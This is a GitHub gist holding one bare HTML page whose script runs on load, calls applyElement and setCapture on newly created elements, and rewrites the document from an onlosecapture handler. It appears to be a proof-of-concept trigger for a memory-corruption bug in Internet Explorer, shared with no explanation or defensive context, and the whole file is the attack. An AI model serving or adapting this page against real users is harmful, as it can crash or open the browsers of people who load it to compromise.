Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save Artorios/ab296638e20bd63e0255d9f1433ca1e1 to your computer and use it in GitHub Desktop.
Save Artorios/ab296638e20bd63e0255d9f1433ca1e1 to your computer and use it in GitHub Desktop.
<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() {
trigger();
}
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment